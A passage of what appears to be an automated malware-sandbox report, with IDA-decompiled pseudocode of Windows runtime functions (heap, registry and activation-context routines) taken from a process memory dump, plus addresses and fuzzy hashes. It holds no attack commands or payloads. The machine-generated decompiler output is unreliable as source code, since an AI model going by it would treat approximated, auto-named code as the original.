						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0191138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01877D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0190FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1948724 & 0x00000008) != 0) {
						E019152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E019215B5(0x1948ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01920eb7
0x01920eb9
0x01920ec0
0x01920ec2
0x01920ecd
0x0192105b
0x0192105b
0x01921061
0x01921066
0x01921066
0x0192106b
0x01921073
0x01921073
0x01920ed3
0x01920ed6
0x01920edc
0x01920ee0
0x01920ee7
0x01920ef0
0x01920ef5
0x01920efa
0x01920efc
0x01920efd
0x01920f03
0x01920f04
0x01920f06
0x01920f07
0x01920f09
0x01920f0e
0x01920f14
0x01920f23
0x01920f2d
0x01920f34
0x01920f34
0x01920f14
0x01920f52
0x00000000
0x00000000
0x01920f58
0x01920f73
0x01920f74
0x01920f79
0x01920f7d
0x01920f80
0x01920f86
0x01920fab
0x01920fb5
0x01920fc6
0x01920fd1
0x01920fe3
0x01920fd3
0x01920fdc
0x01920fdc
0x01920feb
0x01921009
0x01921009
0x01921015
0x01921027
0x01921017
0x01921020
0x01921020
0x0192102f
0x0192103c
0x0192103c
0x01921048
0x01921050
0x01921050
0x01921055
0x00000000
0x01921055
0x01920f88
0x01920f9e
0x01920fa2
0x01920fa9
0x00000000
0x00000000
0x00000000
0x01920fa9
0x00000000

Strings

`, xrefs: 01920F16

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 9dc28c7fac725f10660ffcbfac31c29b3b400d7b59c29c20aaf507a3bfcf9c7c
Instruction ID: 73f431e5e3ad75ee10e18749eaeef8fdafa6b1f1a70b4f820763b460a3cd76c1
Opcode Fuzzy Hash: 9dc28c7fac725f10660ffcbfac31c29b3b400d7b59c29c20aaf507a3bfcf9c7c
Instruction Fuzzy Hash: BC51AF713443829FD325DF28D884F5BBBE9EBC4704F08092CFA4A97294D674E945C762

Uniqueness

Uniqueness Score: -1.00%

Function 0188F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0188F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01874120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01899830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01899990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E018995D0();
							goto L11;
						} else {
							_t109 = L01874620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0189F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E018995D0();
										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0188f0d3
0x0188f0d9
0x0188f0e0
0x0188f0e7
0x0188f0f2
0x0188f0f4
0x0188f0f8
0x0188f100
0x0188f108
0x0188f10d
0x0188f115
0x0188f116
0x0188f11f
0x0188f123
0x0188f124
0x0188f12c
0x0188f130
0x0188f134
0x0188f13d
0x0188f144
0x0188f14b
0x0188f152
0x018cbab0
0x018cbab0
0x0188f158
0x0188f158
0x0188f15a
0x0188f160
0x0188f165
0x0188f166
0x0188f16f
0x0188f173
0x018cbaa7
0x018cbaa7
0x018cbaab
0x00000000
0x0188f179
0x0188f18d
0x0188f191
0x018cbaa2
0x00000000
0x0188f197
0x0188f19b
0x0188f1a2
0x0188f1a9
0x0188f1af
0x0188f1b2
0x0188f1b6
0x0188f1b9
0x0188f1c4
0x0188f1d8
0x0188f1df
0x0188f1e3
0x0188f1eb
0x0188f1ee
0x0188f1f4
0x0188f20f
0x018cbab7
0x018cbabb
0x018cbacc
0x018cbad1
0x0188f215
0x0188f218
0x0188f226
0x0188f22b
0x00000000
0x0188f22b
0x0188f1f6
0x0188f1f6
0x0188f1f9
0x0188f1fb
0x0188f1fb
0x0188f1f4
0x0188f191
0x0188f173
0x0188f152
0x0188f203

Strings

@, xrefs: 0188F124

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 8df316cc4ab5b7b2b813f4f3106fcd5d2d15bd5494f23385244d86f041fd4b5e
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 0D518A71500B11ABC321DF19C841A6BBBF8FF48750F00892DFA95C7690E7B4EA04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018D3540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E018D3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x194d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01890BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E018D3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0189FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E018D3540;
						E0189FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E018ADDD0( &_v1072, _t75, _t79, _t80, _t81);
						E018E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E018997C0();
					}
					return E0189B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E018D3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E018D3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0189FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01899650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E018D3787(_a4,  &_v352, _t80);
						}
					}
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E018995D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x018d3552
0x018d355a
0x018d355d
0x018d3566
0x018d3567
0x018d357e
0x018d358f
0x018d35a1
0x018d35a5
0x018d366b
0x018d366b
0x018d366d
0x018d3672
0x018d3679
0x018d3685
0x018d368d
0x018d369d
0x018d36a7
0x018d36b8
0x018d36c6
0x018d36c7
0x018d36dc
0x018d36e1
0x018d36e7
0x018d36e9
0x018d36e9
0x018d3703
0x018d3703
0x018d35b5
0x018d35c0
0x018d35c4
0x00000000
0x00000000
0x018d35ca
0x018d35d7
0x018d35e2
0x018d35e6
0x018d35e8
0x018d35f5
0x018d35fa
0x018d3603
0x018d3604
0x018d3609
0x018d360a
0x018d3612
0x018d3613
0x018d361e
0x018d3622
0x018d3628
0x018d362f
0x018d362f
0x018d3636
0x018d3638
0x018d363b
0x018d3642
0x018d3642
0x018d3636
0x018d3657
0x018d3657
0x018d365c
0x018d3662
0x018d3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 018D358F

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 5f6ae879b3361e8be0e554a34335b469442ced908498e606477e1bec6924e523
Instruction ID: 90f12920e5c6689b1ac308920d7012813a6a46fb8244d12f52d7c39ec81ee6e1
Opcode Fuzzy Hash: 5f6ae879b3361e8be0e554a34335b469442ced908498e606477e1bec6924e523
Instruction Fuzzy Hash: 1A4132F1D0062DABDF219A54DC84FAEB77CAB54714F0045A5EA09E7241DB309F88CF96

Uniqueness

Uniqueness Score: -1.00%

Function 019205AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E019205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E019207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01899730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0191A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0191A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01921293(_t79, _v40, E019207DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01877D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0191138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x019205c5
0x019205ca
0x019205d3
0x019206db
0x019206db
0x019206dd
0x019206e3
0x019206e3
0x019205dd
0x019205e7
0x019205f6
0x01920600
0x01920607
0x01920610
0x01920615
0x0192061a
0x0192061c
0x0192061e
0x01920624
0x01920625
0x01920627
0x01920628
0x01920631
0x01920640
0x0192064d
0x01920654
0x01920654
0x01920631
0x0192066d
0x01920674
0x00000000
0x00000000
0x01920692
0x0192069e
0x019206b0
0x019206a0
0x019206a9
0x019206a9
0x019206b8
0x019206d6
0x019206d6
0x00000000

Strings

`, xrefs: 01920633

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: f32b9c125f6d1570b97e2109980fed10340bb1f195f0020d5250fb40c0bc784c
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: CF31D33260435A6BE720DE28CD45F9B7BE9BBC4754F184229FA58DB284D770E904C791

Uniqueness

Uniqueness Score: -1.00%

Function 018D3884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E018D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01899650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01874620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01899650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x018d3893
0x018d3896
0x018d3899
0x018d389f
0x018d38a0
0x018d38a4
0x018d38a9
0x018d38ac
0x018d38ad
0x018d38ae
0x018d38af
0x018d38b1
0x018d38b4
0x018d38bb
0x018d38bc
0x018d38bd
0x018d38c4
0x018d38c8
0x018d38ca
0x018d38ca
0x018d38d5
0x018d393e
0x018d3940
0x018d3942
0x018d3952
0x018d3954
0x018d3961
0x018d3961
0x018d3967
0x018d396e
0x018d396e
0x018d3947
0x018d394c
0x00000000
0x018d394c
0x018d38ea
0x018d38ee
0x018d38f8
0x018d38f9
0x018d38ff
0x018d3900
0x018d3902
0x018d3903
0x018d390b
0x018d390f
0x018d3950
0x00000000
0x018d3950
0x018d3915
0x018d391d
0x018d391d
0x018d3922
0x018d3926
0x00000000
0x018d3928
0x018d392b
0x018d392b
0x018d3935
0x018d3937
0x018d3937
0x00000000
0x018d3935
0x018d3926
0x018d38f0
0x00000000

Strings

BinaryName, xrefs: 018D38B4

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: fef0af5df0d8eff66ee0232935354456610fd68690ca8e1a94c46e510ae02beb
Instruction ID: bf6a243be728a4848f0ed0ae4f04480d444f166d890e6dc8be377ff10f85b759
Opcode Fuzzy Hash: fef0af5df0d8eff66ee0232935354456610fd68690ca8e1a94c46e510ae02beb
Instruction Fuzzy Hash: 7931CEB2D0161ABFEB16DA5CC945E6FBB74FB82B20F054169ED14E7291D6309F00C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0188D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0188D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x194d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01874120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0189B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E018998D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E018995D0();
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0188d29c
0x0188d2a6
0x0188d2b1
0x0188d2b5
0x0188d2b6
0x0188d2bc
0x0188d2bd
0x0188d2be
0x0188d2bf
0x0188d2c2
0x0188d2c4
0x0188d2cc
0x0188d384
0x0188d34b
0x0188d34f
0x0188d350
0x0188d351
0x0188d35c
0x0188d35c
0x0188d2d6
0x0188d2da
0x0188d2e1
0x0188d361
0x0188d369
0x0188d36d
0x0188d2e3
0x0188d2e3
0x0188d2e3
0x0188d2e5
0x0188d2ed
0x0188d2f5
0x0188d2fa
0x0188d302
0x0188d303
0x0188d30b
0x0188d30f
0x0188d313
0x0188d318
0x0188d31c
0x0188d320
0x0188d379
0x0188d37d
0x00000000
0x00000000
0x018caffe
0x018cb001
0x018cb011
0x00000000
0x0188d322
0x0188d322
0x0188d330
0x0188d337
0x0188d35d
0x0188d339
0x0188d33f
0x0188d38c
0x0188d38c
0x0188d33f
0x0188d349
0x00000000
0x0188d349

Strings

@, xrefs: 0188D303

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3e76e6f7e88c8eb24e38cc46a60c9c3b6d917b987d13f7a133d3d3cdef166703
Instruction ID: abb048327a519b1bf522868efce62365dcc55d6f4fd355fe10881df19f63c827
Opcode Fuzzy Hash: 3e76e6f7e88c8eb24e38cc46a60c9c3b6d917b987d13f7a133d3d3cdef166703
Instruction Fuzzy Hash: 2D31AFB15483059FC721EF6CC88096BBBE8EB95758F000A2EF994D3291E634DE04CB93

Uniqueness

Uniqueness Score: -1.00%

Function 01861B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01861B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0189BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0189A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0189A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01874620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01861b8f
0x01861b9a
0x01861b9c
0x01861b9e
0x01861ba3
0x018b7010
0x018b7010
0x00000000
0x01861ba9
0x01861ba9
0x01861bae
0x00000000
0x01861bc5
0x01861bca
0x01861bcf
0x01861bd0
0x01861bd1
0x01861bd2
0x01861bd6
0x01861bdc
0x01861be0
0x018b6ffc
0x018b7000
0x00000000
0x018b7006
0x018b7009
0x018b7009
0x01861be6
0x01861bec
0x01861c0b
0x01861c0b
0x01861c0c
0x01861c11
0x01861c12
0x01861c15
0x01861c1b
0x01861c1f
0x01861c31
0x01861c33
0x018b7026
0x018b7026
0x01861c21
0x01861c24
0x01861c24
0x01861bee
0x01861bee
0x01861bf2
0x01861c3a
0x01861bf4
0x01861bf4
0x01861c05
0x01861c05
0x01861c09
0x01861c3e
0x00000000
0x00000000
0x00000000
0x01861c09
0x01861bec
0x01861be0
0x01861bae
0x01861c2e

Strings

WindowsExcludedProcs, xrefs: 01861BC5

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 7f78933c433e61dbff2c22ca4b6d91053aeedc106d1b102533de1c264623761d
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 6821F836501619EBDB229A5D8884F9FBB6DAFC0B50F054426FA04CB205D630DF01D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0187F716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0187F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
